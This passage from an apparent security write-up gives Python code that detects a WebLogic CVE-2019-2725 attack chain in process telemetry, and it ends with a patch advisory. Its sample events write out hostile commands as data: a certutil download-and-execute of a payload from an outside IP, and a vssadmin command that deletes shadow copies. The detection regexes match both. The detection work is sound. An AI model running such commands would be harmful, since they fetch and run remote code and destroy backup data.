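    telemetry would carry). All sample values below are constructed."""
    host: str
    parent_image: str
    image: str
    command_line: str


# Assumption: the WebLogic server runs inside a JVM, so on Windows the process
# from which an HTTP-borne exploit executes commands shows up as java.exe.
WEBSERVER_IMAGES = ("java.exe",)

# certutil abused as a downloader: "-urlcache -split -f <url> <file>".
CERTUTIL_DOWNLOAD = re.compile(
    r"\bcertutil(?:\.exe)?\b.*-urlcache.*-f\s+https?://", re.IGNORECASE)
# Shadow-copy deletion. The article only says vssadmin is invoked; the
# "delete shadows" form is the one ransomware runs and is assumed here.
VSSADMIN_DELETE = re.compile(
    r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def classify(ev: ProcEvent) -> Optional[str]:
    """Tag an event with the attack stage it matches, or None if benign."""
    if CERTUTIL_DOWNLOAD.search(ev.command_line):
        # A web server's JVM spawning a certutil download is the RCE
        # fingerprint; certutil from an interactive shell is only a weak signal.
        if _basename(ev.parent_image) in WEBSERVER_IMAGES:
            return "webserver_certutil_download"
        return "certutil_download"
    if VSSADMIN_DELETE.search(ev.command_line):
        return "shadow_copy_delete"
    return None


def stages_by_host(events: List[ProcEvent]) -> Dict[str, List[str]]:
    """Collect matched stages per host, in the order they were observed."""
    stages: Dict[str, List[str]] = defaultdict(list)
    for ev in events:
        tag = classify(ev)
        if tag:
            stages[ev.host].append(tag)
    return dict(stages)


def compromised_hosts(events: List[ProcEvent]) -> List[str]:
    """Hosts where a web-server certutil download was followed by shadow-copy
    deletion: the full chain, which warrants immediate isolation."""
    hits = []
    for host, tags in stages_by_host(events).items():
        if "webserver_certutil_download" not in tags:
            continue
        first = tags.index("webserver_certutil_download")
        if "shadow_copy_delete" in tags[first + 1:]:
            hits.append(host)
    return sorted(hits)


# Constructed telemetry: one exploited WebLogic host, one admin listing shadow
# copies legitimately, one developer fetching a tool with certutil by hand.
SAMPLE_EVENTS = [
    ProcEvent("WLS01", r"C:\Oracle\jdk\bin\java.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c certutil -urlcache -split -f http://203.0.113.10/payload.exe "
              r"C:\Windows\Temp\payload.exe & C:\Windows\Temp\payload.exe"),
    ProcEvent("WLS01", r"C:\Windows\Temp\payload.exe", r"C:\Windows\System32\vssadmin.exe",
              r"vssadmin.exe delete shadows /all /quiet"),
    ProcEvent("FS02", r"C:\Windows\explorer.exe", r"C:\Windows\System32\vssadmin.exe",
              r"vssadmin list shadows"),
    ProcEvent("DEV03", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
              r"certutil -urlcache -split -f https://example.com/tool.zip tool.zip"),
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.host, _basename(ev.image), "->", classify(ev))
    print("full chain on:", compromised_hosts(SAMPLE_EVENTS))
```

The two stages are kept separate on purpose: a single `certutil -urlcache` from a developer's shell is noise, while the same command with a web-server JVM as parent is worth an alert on its own, and the shadow-copy deletion that follows it turns a suspicion into a confirmed intrusion.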

Oracle has published a security alert for the vulnerability (CVE-2019-2725), and administrators are advised to apply the patch.